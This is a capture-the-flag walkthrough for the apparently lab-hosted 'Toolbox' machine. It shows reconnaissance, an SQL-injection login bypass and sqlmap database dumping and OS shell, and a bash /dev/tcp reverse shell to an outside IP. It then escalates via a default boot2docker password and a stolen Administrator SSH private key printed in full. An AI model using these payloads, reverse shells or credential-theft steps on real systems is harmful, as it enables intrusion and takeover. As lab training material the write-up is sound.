Toolbox

Windows : FTP, sqlmap, SQLI Blind,

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.236                     

21/tcp  open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla

22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)

135/tcp open  msrpc         Microsoft Windows RPC

139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn

443/tcp open  tcpwrapped

445/tcp open  microsoft-ds?

Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-16T02:02:31
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.236    

123/udp  open|filtered ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
500/udp  open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr

Device type: general purpose
Running: Microsoft Windows 10|2008|2012|7|8.1|Longhorn|Vista
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista:::business

Enumeration: HTTPS Port 443/tcp

There’s a certificate on 443 with the domain name admin.megalogistic.com.

Apache/2.4.38 (Debian) Server 10.10.10.236 Port 443

https://10.10.10.236/ https://10.10.10.236/index.html https://10.10.10.236/booking.html

view-source: https://10.10.10.236/index.html Copyright ©document.write(new Date().getFullYear()); All rights reserved | This template is made with by Colorlib

The site is for a shipping / logistics company: megalogistic.com

Most of the site is just lorem ipsum text (filler), and the forms don’t seem to submit anywhere. I could make a list of potential usernames from about.html, but it’s just names without emails, so I’ll look elsewhere first. All the pages look static at this point.

Fuzz for VHosts:

Given the existence of admin.megalogistic.com, I’ll fuzz to see if any other virtual hosts display something different, but didn’t find anything besides admin:

┌──(kali💀kali)-[~]
└─$ wfuzz -u https://10.10.10.236 -H "Host: FUZZ.megalogistic.com" -w /usr/share/seclists/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 22357

Target: https://10.10.10.236/
Total requests: 100000
=====================================================================
ID           Response   Lines    Word       Chars       Payload                         
=====================================================================
000000036:   200        35 L     83 W       889 Ch      "admin"                         
000037212:   400        12 L     53 W       424 Ch      "*"   

admin.megalogistic.com: This page presents a login form: https://megalogistic.com/ https://admin.megalogistic.com/

┌──(kali💀kali)-[~/Desktop]
└─$ sudo nano /etc/hosts     

10.10.10.236	megalogistic.com
10.10.10.236	admin.megalogistic.com

┌──(kali💀kali)-[~/Desktop]
└─$ whatweb -a3 https://10.10.10.236/ -v
WhatWeb report for https://10.10.10.236/
Status    : 200 OK
Title     : MegaLogistics
IP        : 10.10.10.236
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], Bootstrap[4.1.3], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery[3.3.1], Script                                                                        

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.38 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Version      : 4.1.3
        Version      : 4.1.3
        Website     : https://getbootstrap.com/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Debian Linux
        String       : Apache/2.4.38 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Version      : 3.3.1
        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 16 Jan 2024 05:35:28 GMT
        Server: Apache/2.4.38 (Debian)
        Last-Modified: Tue, 18 Feb 2020 06:51:26 GMT
        ETag: "5755-59ed419c2b780-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3570
        Connection: close
        Content-Type: text/html

Enumeration: SMB Port 139/445/tcp

Anonymous access is not permitted to SMB:

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -N -L //10.10.10.236
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.236 -u '' -p '' --shares

SMB         10.10.10.236    445    TOOLBOX          [*] Windows 10.0 Build 17763 x64 (name:TOOLBOX) (domain:Toolbox) (signing:False) (SMBv1:False)
SMB         10.10.10.236    445    TOOLBOX          [-] Toolbox\: STATUS_ACCESS_DENIED 
SMB         10.10.10.236    445    TOOLBOX          [-] Error getting user: list index out of range
SMB         10.10.10.236    445    TOOLBOX          [-] Error enumerating shares: Error occurs while reading from remote(104)

Enumeration: FTP Port 21/tcp

As nmap noted, anonymous login is available for FTP. I’ll give it the username anonymous and a blank password:

FileZilla ftpd ftp-anon: Anonymous FTP login allowed (FTP code 230)

┌──(kali💀kali)-[~]
└─$ cd Desktop
                                                                                                 
┌──(kali💀kali)-[~/Desktop]
└─$ ftp 10.10.10.236  
Connected to 10.10.10.236.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.236:kali): Anonymous
331 Password required for anonymous
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
229 Entering Extended Passive Mode (|||55712|)
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
226 Successfully transferred "/"

ftp> get docker-toolbox.exe
local: docker-toolbox.exe remote: docker-toolbox.exe
229 Entering Extended Passive Mode (|||51982|)
150 Opening data channel for file download from server of "/docker-toolbox.exe"
100% |****************************************************|   231 MiB  232.26 KiB/s    00:00 ETA
226 Successfully transferred "/docker-toolbox.exe"
242520560 bytes received in 16:59 (232.26 KiB/s)

Docker Toolbox is an older solution for running Docker in Windows, before Windows had native Docker support. It basically ran a VirtualBox Linux VM that runs Docker and its containers.

Install Docker Toolbox in Windowsdocs.bitnami.com

Shell as postgres in container

Identify SQL Injection: If I try to login with password ', the page return the form, with an error message in the background at the top:

Warning: pg_query(): Query failed: ERROR: unterminated quoted string at or near "''');" LINE 1: ...FROM users WHERE username = 'admin' AND password = md5('''); ^ in /var/www/admin/index.php on line 10
Warning: pg_num_rows() expects parameter 1 to be resource, bool given in /var/www/admin/index.php on line 11

There are multiple things to learn from this:

• The form is likely vulnerable to SQL injection.

• The error is from pg_query(), which suggests the backend database is PostgreSQL.

• The passwords are stored using MD5 hashes.

Bypass Login: From the error above, I can guess that the SQL query being run looks like:

SELECT * FROM users WHERE username = '{input user}' AND password = md5('{input password}');

Then the site likely checks if there are results to determine if access should be allowed. If I submit the username ' or 1=1-- -, then the query will be:

SELECT * FROM users WHERE username = '' or 1=1-- -'' AND password = md5('anything');

Because -- - makes anything after a comment, this will return all users, and hopefully let me in:

' or 1=1-- -
admin

I’m at the admin dashboard, but it doesn’t do much: ToDo List

• Send credentials to Tony

• Update Printer Drivers

Enumerate DB: A login form isn’t displaying data from the DB back to the page, so it’s a more difficult blind injection. For an easy-rated box like Toolbox, I’ll turn to sqlmap. I’ll save a POST request for login from Burp to a file with right-click, “Copy to file”. It’s important that this request not have any injections in it, or sqlmap will yell.

I’ll run with -r login.request to give it the file to work from, --force-ssl (as that’s where the site is), and --batch to accept the defaults at the prompts. It finds four injections:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch

sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:

Parameter: username (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=admin' AND (SELECT (CASE WHEN (2512=2512) THEN NULL ELSE CAST((CHR(76)||CHR(111)||CHR(120)||CHR(115)) AS NUMERIC) END)) IS NULL AND 'mAec'='mAec&password=admin

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND 1420=CAST((CHR(113)||CHR(112)||CHR(107)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(106)||CHR(112)||CHR(113)) AS NUMERIC) AND 'nKhs'='nKhs&password=admin

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=admin';SELECT PG_SLEEP(5)--&password=admin

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=admin' AND 7695=(SELECT 7695 FROM PG_SLEEP(5)) AND 'LVhl'='LVhl&password=admin

I’ll add --dbs to the end of the command and run it again to list the dbs:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --dbs 

available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

I will list the tables in public, finding one:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch -D public --tables

Database: public
[1 table]
+-------+
| users |
+-------+

I will dump a single user, admin, and their password hash. sqlmap tries to crack it but fails, and Google doesn’t know it either.

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch -D public -T users --dump 

Database: public
Table: users
[1 entry]
+----------------------------------+----------+
| password                         | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin    |
+----------------------------------+----------+

Commands via SQL: One technique that rarely works, but is always worth trying is the --os-cmd flag in sqlmap. From the docs, for PostgreSQL, it will upload a shared library to the system that will work with the database and run arbitrary commands on the system.

UsageGitHub

I’ll try whoami since it will work on either Linux or Windows, and it works:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-cmd whoami

do you want to retrieve the command standard output? [Y/n/a] Y
[01:43:00] [INFO] retrieved: 'postgres'

The previous command identified the OS as Debian 10. Given this is a Windows host according to HTB, this must be in a Docker container. The id command returns as well:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-cmd id

do you want to retrieve the command standard output? [Y/n/a] Y
[01:45:28] [INFO] retrieved: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl...
command standard output: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)'

Shell: The --os-shell flag will drop into an interactive prompt to run more than one command as well:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-shell

[01:47:57] [INFO] retrieved: 'postgres'
command standard output: 'postgres'
os-shell> 

I’ll start nc and give sqlmap a Bash reverse shell to see if it works:

┌──(kali💀kali)-[~]
└─$ nc -lnvp 443

os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.4/443 0>&1"

Legacy Python is not installed, but Python3 is:

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python -V
python -V
bash: python: command not found

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -V
python3 -V
Python 3.7.3

I’ll upgrade my shell using the standard trick:

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("bash")'

This is important as I can’t do the next steps without a full TTY. There’s also a user.txt in postgres’ home directory (not sure why it says flag.txt in the file, but the hash works):

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ cd ~

postgres@bc56e3cc55e9:/var/lib/postgresql$ ls
11  user.txt

postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
f0183e44378ea9----------------  flag.txt

Shell as docker/root in VM

Enumeration: I’m definitely not on the host machine now. ifconfig shows the IP 172.17.0.2:

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 721124  bytes 51846855 (49.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 306291  bytes 1641368970 (1.5 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 13736  bytes 4744312 (4.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13736  bytes 4744312 (4.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

The file system is quite empty.

Docker-Toolbox: At this point, a bit more detail about Docker-Toolbox is necessary. The solution is deprecated, but that doesn’t mean it can’t be seen in the wild. Docker Toolbox installs VirtualBox, and creates a VM running the boot2docker Linux distribution. From it’s README:

GitHub - boot2docker/boot2docker: DEPRECATED; see https://github.com/boot2docker/boot2docker/pull/1408GitHub

Boot2Docker is a lightweight Linux distribution made specifically to run Docker containers. It runs completely from RAM, is a ~45MB download and boots quickly.

sudo:

┌──(kali💀kali)-[~]
└─$ nc -lnvp 5555
listening on [any] 5555 ...

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
ssh docker@172.17.0.1
Pseudo-terminal will not be allocated because stdin is not a terminal.
Permission denied, please try again.
Permission denied, please try again.
docker@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ sudo ssh docker@172.17.0.1
sudo ssh docker@172.17.0.1
bash: sudo: command not found

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("bash")'

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1

docker@172.17.0.1's password: tcuser

   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.
 (/-_--_-\)           www.tinycorelinux.net


docker@box:~$ sudo -l  
User docker may run the following commands on this host:
    (root) NOPASSWD: ALL

docker@box:~$ sudo su                                                          

root@box:/home/docker# 

Shell as root

Enumeration: There’s nothing interesting in any of the homedirs on this VM. This is, as I suspected, boot2docker:

root@box:/home/docker# cat /etc/os-release                                     
cat /etc/os-release  
NAME=Boot2Docker
VERSION=19.03.5
ID=boot2docker
ID_LIKE=tcl
VERSION_ID=19.03.5
PRETTY_NAME="Boot2Docker 19.03.5 (TCL 10.1)"
ANSI_COLOR="1;34"
HOME_URL="https://github.com/boot2docker/boot2docker"
SUPPORT_URL="https://blog.docker.com/2016/11/introducing-docker-community-directory-docker-community-slack/"
BUG_REPORT_URL="https://github.com/boot2docker/boot2docker/issues"

There’s an interesting folder at the system root, c:

root@box:/# ls                                                                 
ls
bin           home          linuxrc       root          sys
c             init          mnt           run           tmp
dev           lib           opt           sbin          usr
etc           lib64         proc          squashfs.tgz  var

root@box:/# cd c                                                               
root@box:/c# ls                                                                
Users

It looks like it has mounted the Users directory, which is standard in a Windows system:

root@box:/c# cd Users/                                                         

root@box:/c/Users# ls                                                          
Administrator  Default        Public         desktop.ini
All Users      Default User   Tony

In the Administrator’s folder, in addition to a bunch of typical Windows stuff, there’s a .ssh directory:

root@box:/c/Users# cd Administrator                                            

root@box:/c/Users/Administrator# ls -la                                        
total 1481
drwxrwxrwx    1 docker   staff         8192 Feb  8  2021 .
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 ..
drwxrwxrwx    1 docker   staff         4096 Jan 16 01:59 .VirtualBox
drwxrwxrwx    1 docker   staff            0 Feb 18  2020 .docker
drwxrwxrwx    1 docker   staff            0 Feb 19  2020 .ssh
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 3D Objects
drwxrwxrwx    1 docker   staff            0 Feb 18  2020 AppData
drwxrwxrwx    1 docker   staff            0 Feb 19  2020 Application Data
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Contacts
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 Cookies
dr-xr-xr-x    1 docker   staff            0 Feb  8  2021 Desktop
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 Documents
dr-xr-xr-x    1 docker   staff            0 Apr  5  2021 Downloads
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Favorites
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Links
drwxrwxrwx    1 docker   staff         4096 Feb 18  2020 Local Settings
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Music
dr-xr-xr-x    1 docker   staff         4096 Feb 19  2020 My Documents
-rwxrwxrwx    1 docker   staff       262144 Jan 11  2022 NTUSER.DAT
-rwxrwxrwx    1 docker   staff        65536 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TM.blf                                                                                  
-rwxrwxrwx    1 docker   staff       524288 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000001.regtrans-ms                                             
-rwxrwxrwx    1 docker   staff       524288 Feb 18  2020 NTUSER.DAT{1651d10a-52b3-11ea-b3e9-000c29d8029c}.TMContainer00000000000000000002.regtrans-ms                                             
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 NetHood
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Pictures
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Recent
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Saved Games
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Searches
dr-xr-xr-x    1 docker   staff            0 Sep 15  2018 SendTo
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Start Menu
drwxrwxrwx    1 docker   staff            0 Sep 15  2018 Templates
dr-xr-xr-x    1 docker   staff            0 Feb 18  2020 Videos
-rwxrwxrwx    1 docker   staff        12288 Feb 18  2020 ntuser.dat.LOG1
-rwxrwxrwx    1 docker   staff        98304 Feb 18  2020 ntuser.dat.LOG2
-rwxrwxrwx    1 docker   staff           20 Feb 18  2020 ntuser.ini

While this is typically thought of as a Linux thing, Windows with SSH can have this as well to allow for key-based auth and other standard SSH needs. There is a key inside:

root@box:/c/Users/Administrator# cd .ssh                                       

root@box:/c/Users/Administrator/.ssh# ls                                       
authorized_keys  id_rsa           id_rsa.pub       known_hosts

The public key here is in authorized_keys, as this returns nothing:

root@box:/c/Users/Administrator/.ssh# diff id_rsa.pub authorized_keys          
diff id_rsa.pub authorized_keys

ssh-keygen -y -e -f keyfile will return the public key for the key, so I can use that to check if the private key here matches the public (and the one in authorized_key):

root@box:/c/Users/Administrator/.ssh# ssh-keygen -y -e -f id_rsa               
ssh-keygen -y -e -f id_rsa  
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@box from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQC+jhIuWD92RK0DiMNQ3GAXyRs0AX7ohgs044J6ml
+PPpFI5C8x3TxpsbKeEozOyKJUJ4miP0vwZ9JcZkh+wAhZef2fI1oN0CmgXsx+bUoi2A75
b2YzuUCuzjOAHMwZCV4iyRC9ZNwqtA10IOP0nE0huFguEleCuj67l1boRxjOrYxI5GbsD5
5d+Y+92viETTA1QjDHag4+vZ24F+bG6EvyZlBa7lTX4il7Y2/h8BRiEoZNYePihyNTAb1d
xTSIjilwdPedc8qYaOg/KI/OlrlZ2InxCkwTf3w2d7iafE5uhZOneMZonUa6dkLKJzSJLB
6ZwEmI3J9kKFOKlaYEwrzz
---- END SSH2 PUBLIC KEY ----

root@box:/c/Users/Administrator/.ssh# ssh-keygen -y -e -f id_rsa.pub           
ssh-keygen -y -e -f id_rsa.pub  
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@box from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQC+jhIuWD92RK0DiMNQ3GAXyRs0AX7ohgs044J6ml
+PPpFI5C8x3TxpsbKeEozOyKJUJ4miP0vwZ9JcZkh+wAhZef2fI1oN0CmgXsx+bUoi2A75
b2YzuUCuzjOAHMwZCV4iyRC9ZNwqtA10IOP0nE0huFguEleCuj67l1boRxjOrYxI5GbsD5
5d+Y+92viETTA1QjDHag4+vZ24F+bG6EvyZlBa7lTX4il7Y2/h8BRiEoZNYePihyNTAb1d
xTSIjilwdPedc8qYaOg/KI/OlrlZ2InxCkwTf3w2d7iafE5uhZOneMZonUa6dkLKJzSJLB
6ZwEmI3J9kKFOKlaYEwrzz
---- END SSH2 PUBLIC KEY ----

They match!

SSH: I’ll create a copy of the private key on my local VM, and set the permissions so that SSH will trust it:

root@box:/c/Users/Administrator/.ssh# cat id_rsa                               
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvo4SLlg/dkStA4jDUNxgF8kbNAF+6IYLNOOCeppfjz6RSOQv
Md08abGynhKMzsiiVCeJoj9L8GfSXGZIfsAIWXn9nyNaDdApoF7Mfm1KItgO+W9m
M7lArs4zgBzMGQleIskQvWTcKrQNdCDj9JxNIbhYLhJXgro+u5dW6EcYzq2MSORm
7A+eXfmPvdr4hE0wNUIwx2oOPr2duBfmxuhL8mZQWu5U1+Ipe2Nv4fAUYhKGTWHj
4ocjUwG9XcU0iI4pcHT3nXPKmGjoPyiPzpa5WdiJ8QpME398Nne4mnxOboWTp3jG
aJ1GunZCyic0iSwemcBJiNyfZChTipWmBMK88wIDAQABAoIBAH7PEuBOj+UHrM+G
Stxb24LYrUa9nBPnaDvJD4LBishLzelhGNspLFP2EjTJiXTu5b/1E82qK8IPhVlC
JApdhvDsktA9eWdp2NnFXHbiCg0IFWb/MFdJd/ccd/9Qqq4aos+pWH+BSFcOvUlD
vg+BmH7RK7V1NVFk2eyCuS4YajTW+VEwD3uBAl5ErXuKa2VP6HMKPDLPvOGgBf9c
l0l2v75cGjiK02xVu3aFyKf3d7t/GJBgu4zekPKVsiuSA+22ZVcTi653Tum1WUqG
MjuYDIaKmIt9QTn81H5jAQG6CMLlB1LZGoOJuuLhtZ4qW9fU36HpuAzUbG0E/Fq9
jLgX0aECgYEA4if4borc0Y6xFJxuPbwGZeovUExwYzlDvNDF4/Vbqnb/Zm7rTW/m
YPYgEx/p15rBh0pmxkUUybyVjkqHQFKRgu5FSb9IVGKtzNCtfyxDgsOm8DBUvFvo
qgieIC1S7sj78CYw1stPNWS9lclTbbMyqQVjLUvOAULm03ew3KtkURECgYEA17Nr
Ejcb6JWBnoGyL/yEG44h3fHAUOHpVjEeNkXiBIdQEKcroW9WZY9YlKVU/pIPhJ+S
7s++kIu014H+E2SV3qgHknqwNIzTWXbmqnclI/DSqWs19BJlD0/YUcFnpkFG08Xu
iWNSUKGb0R7zhUTZ136+Pn9TEGUXQMmBCEOJLcMCgYBj9bTJ71iwyzgb2xSi9sOB
MmRdQpv+T2ZQQ5rkKiOtEdHLTcV1Qbt7Ke59ZYKvSHi3urv4cLpCfLdB4FEtrhEg
5P39Ha3zlnYpbCbzafYhCydzTHl3k8wfs5VotX/NiUpKGCdIGS7Wc8OUPBtDBoyi
xn3SnIneZtqtp16l+p9pcQKBgAg1Xbe9vSQmvF4J1XwaAfUCfatyjb0GO9j52Yp7
MlS1yYg4tGJaWFFZGSfe+tMNP+XuJKtN4JSjnGgvHDoks8dbYZ5jaN03Frvq2HBY
RGOPwJSN7emx4YKpqTPDRmx/Q3C/sYos628CF2nn4aCKtDeNLTQ3qDORhUcD5BMq
bsf9AoGBAIWYKT0wMlOWForD39SEN3hqP3hkGeAmbIdZXFnUzRioKb4KZ42sVy5B
q3CKhoCDk8N+97jYJhPXdIWqtJPoOfPj6BtjxQEBoacW923tOblPeYkI9biVUyIp
BYxKDs3rNUsW1UUHAvBh0OYs+v/X+Z/2KVLLeClznDJWh/PNqF5I
-----END RSA PRIVATE KEY-----

┌──(kali💀kali)-[~/Desktop]
└─$ nano key   

┌──(kali💀kali)-[~/Desktop]
└─$ chmod 600 key

┌──(kali💀kali)-[~/Desktop]
└─$ ssh -i key administrator@10.10.10.236
The authenticity of host '10.10.10.236 (10.10.10.236)' can't be established.
ED25519 key fingerprint is SHA256:KJAib23keV2B8xvFaxg7e79uztryW+LYX+Wb2qA9u4k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.236' (ED25519) to the list of known hosts.
Microsoft Windows [Version 10.0.17763.1039]
(c) 2018 Microsoft Corporation. All rights reserved.

administrator@TOOLBOX C:\Users\Administrator>whoami
toolbox\administrator
                                                                                                       
administrator@TOOLBOX C:\Users\Administrator>cd Desktop
                                                      
administrator@TOOLBOX C:\Users\Administrator\Desktop>type root.txt 
cc9a0b76ac17-----------------------